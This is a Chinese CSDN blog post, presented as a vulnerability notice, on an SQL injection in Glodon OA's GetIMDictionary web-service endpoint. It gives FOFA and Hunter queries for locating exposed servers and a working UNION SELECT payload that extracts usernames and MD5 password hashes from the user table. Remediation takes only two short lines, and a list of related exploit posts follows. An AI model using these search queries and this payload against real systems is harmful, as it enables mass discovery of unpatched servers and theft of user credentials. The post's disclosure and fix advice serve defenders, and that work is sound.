漏洞通告| 广联达OA SQL注入漏洞获取用户名密码

最新推荐文章于 2024-04-09 21:49:02 发布
最新推荐文章于 2024-04-09 21:49:02 发布
阅读量499 收藏 10
点赞数 5
文章标签: sql web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/137134744
版权

广联达OA介绍

广联达办公OA是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。

图片

资产收集

fofa:fid=”/yV4r5PdARKT4jaqLjJYqw==”或者body=”/Services/Identification/Server”
hunter:web.body=”/Services/Identification/Server/“

图片

漏洞点

广联达OA SQL注入漏洞位于 /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary 接口下,直接访问,页面会提示缺少参数key,说明存在SQL注入

图片

漏洞复现

payload:

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

效果如下:

图片

修复建议

1.问/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary 地址的时候,可以让报错信息模糊化
2.对key参数的传参进行过滤

 申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

渗透测试老鸟-九青
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
广联达-Linkworks 协同办公管理平台 多处SQL注入漏洞复现
0xSec
12-14 1207
广联达-Linkworks协同办公管理平台 GetUserByEmployeeCode、GetUserByUserCode、EmailAccountOrgUserService.asmx、DataExchange.ashx等接口处存在SQL注入漏洞,未经身份认证的攻击者可获取用户名密码等敏感信息。
广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现(HW0day)
0xSec
08-12 3792
​​由于 广联达 Linkworks办公OA GetIMDictionary接口未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。而msgbroadcastuploadfile.aspx 存在后台文件上传漏洞,攻击者通过SQL注入获取管理员信息后,可以登陆发送请求包获取服务器权限。
漏洞复现】广联达OA漏洞合集(信息泄露+SQL注入+文件上传)
做自己喜欢的事,并将其发挥到极致!
09-18 3271
广联达 Linkworks 办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。广联达OA曝出多处漏洞,攻击者可通过该漏洞获取服务器敏感数据信息,注入恶意Payload获得服务器控制权限。
广联达OA前台sql注入+后台文件上传漏洞复现分析
博客地址 www.sec0nd.top
08-15 2296
广联达OA前台sql注入+后台文件上传漏洞复现分析
广联达OA GetUserByUserCode SQL注入漏洞
xiaokp7的博客
09-13 472
广联达办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。由于 广联达 Linkworks办公OA GetUserByUserCode接口未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞
【0day】复现广联达-Linkworks 协同办公管理平台GetUserByUserCode接口存在SQL注入漏洞
记录并分享学习安全的知识点..
08-12 702
广联达科技股份有限公司成立于1998年,以建设工程领域专业应用为核心基础支撑,以产业大数据、产业新金融等为增值服务的数字建筑平台服务商。广联达-Linkworks 协同办公管理平台GetUserByUserCode接口存在SQL注入漏洞
漏洞复现】广联达办公OAsql+文件上传+弱口令
失心少年
09-05 719
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!广联达办公OA是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。默认弱口令admin password,后面就不提了。
【1day】复现广联达-Linkworks 协同办公管理平台ConfigService.asmx接口SQL注入漏洞
记录并分享学习安全的知识点..
08-12 681
广联达科技股份有限公司成立于1998年,以建设工程领域专业应用为核心基础支撑,以产业大数据、产业新金融等为增值服务的数字建筑平台服务商。广联达-Linkworks 协同办公管理平台ConfigService.asmx接口SQL注入漏洞
新接口-广联达WebService GetAllData 信息泄露漏洞复现-0day未公开漏洞
weixin_43167326的博客
02-25 603
广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达Q公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。
2023HW-8月(10-15)53个0day,1day漏洞汇总含POC、EXP
tangshuangsss的专栏
08-16 4598
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介2023HW-8月10-15号0day、1day漏洞汇总(已更新),包含以下漏洞需要自取。链接:https://pan.baidu.com/s/1Tr94yVFSHn_C6YiJcVprAw 提取码:6666通达OAsql注入漏洞 CVE-2023-4165 POC.. 2 通达OAsql注入漏洞 CVE-2023...
漏洞复现】广联达-Linkworks-test-信息泄露
知黑而守白
01-18 107
广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。由于广联达 test 接口处设置不当,未经身份认证的攻击者通过构造特殊的数据包,可以访问系统敏感信息。
广联达协同办公系统GetAllData接口存在敏感信息泄露漏洞 附POC软件
nnn2188185的博客
02-26 137
广联达协同办公系统GetAllData接口存在敏感信息泄露漏洞 附POC软件
广联达gwgdwebservice接口SQL注入漏洞(含批量验证poc)
最新发布
weixin_43567873的博客
04-09 92
广联达gwgdwebservice接口SQL注入漏洞(含批量验证poc)
广联达 GetAllData 信息泄露漏洞
qq_36334672的博客
03-10 316
广联达-Linkworks协同办公管理平台 GetAllData接口处存在信息泄露漏洞,恶意可获取用户名密码等敏感信息。破解密码md5可登录后台。
广联达OA GetIMDictionarySQL注入漏洞
xiaokp7的博客
09-13 248
广联达办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。由于广联达 Linkworks办公OA GetIMDictionary接口未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞
广联达2020写锁工具支持6.0.zip_Apache Shiro 1.6.0 发布!修复绕过授权高危漏洞,尽快升级...
weixin_39946767的博客
11-27 1269
Apache Shiro 1.6.0 发布!修复绕过授权高危漏洞Apache Shiro 是一个强大且易用的 Java 安全框架,执行身份验证、授权、密码和会话管理。使用 Shiro 的易于理解的 API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。更新日志过滤器链解析不正确。Base64 工具类#decode.异常添加对全局过滤器支持更新相关依赖CVE-2...
Spring框架漏洞复现大杂烩!!!
热门推荐
SoulCat
02-27 2万+
Spring框架漏洞复现大杂烩!!! 寻了半生的春天 你一笑 便是了 总体概述: Spring是一个开源框架,核心是控制反转(IoC)和面向切面(AOP)。简单来说,Spring是一个分层的JavaSE/EE full-stack(一站式) 轻量级开源框架。简单说就是创建对象由以前的程序员自己new 构造方法来调用,变成交由Spring来创建对象 。类比Struts 2框架绝大部分的安全漏洞...
从一个数字型注入认识SQL漏洞
qq_45721814的博客
10-27 306
1、先打开pikachu界面点开SQL inject 2、选择post选项中的用户然后查询,pikachu会给我们一个邮箱地址 接着我们可以猜测一下后端是如果查询验证这个用户名的正确性,我们可以打开记事本记录一下自己所猜想的一些事项,然后去pikachu数据库中我们可以尝试一下自己猜测的是否正确 紧接着我们从burpsuite里面会发现post的请求然后我们可以将它发送到repeater ...
泛微oa e-cology v9 browser.jsp sql注入漏洞
09-15
泛微OA E-Cology V9是一款常用的企业办公自动化系统,该系统的browser.jsp页面存在SQL注入漏洞SQL注入是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据或者对系统进行非法操作。 泛微OA E-Cology V9中的browser.jsp页面是用于显示OA系统中的个人文件夹和公共文件夹。攻击者可以在该页面中输入恶意的SQL语句,通过执行这些恶意SQL语句,攻击者可以获取到不应该被访问的数据,比如其他用户的文件,甚至可以对数据库进行修改和损坏。 为了防止SQL注入漏洞的利用,可以采取以下措施: 1. 输入过滤和验证:在服务器端对用户输入的数据进行过滤和验证,去除或转义可能包含恶意SQL代码的字符,确保只接受合法的输入。 2. 使用参数化查询:尽量使用参数化查询代替拼接SQL语句的方式,参数化查询可以预编译SQL语句,避免在拼接时引入恶意代码。 3. 限制数据库用户的权限:对数据库用户进行权限控制,确保每个用户只拥有最小必要的权限,减少攻击者利用SQL注入漏洞进行非法操作的机会。 4. 及时更新和修补漏洞:及时跟进厂商的安全通告并安装最新的补丁程序,确保系统始终处于最新的安全状态。 综上所述,泛微OA E-Cology V9中的browser.jsp页面存在SQL注入漏洞,但通过合理的安全措施和注意事项,我们可以有效地减少该漏洞被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值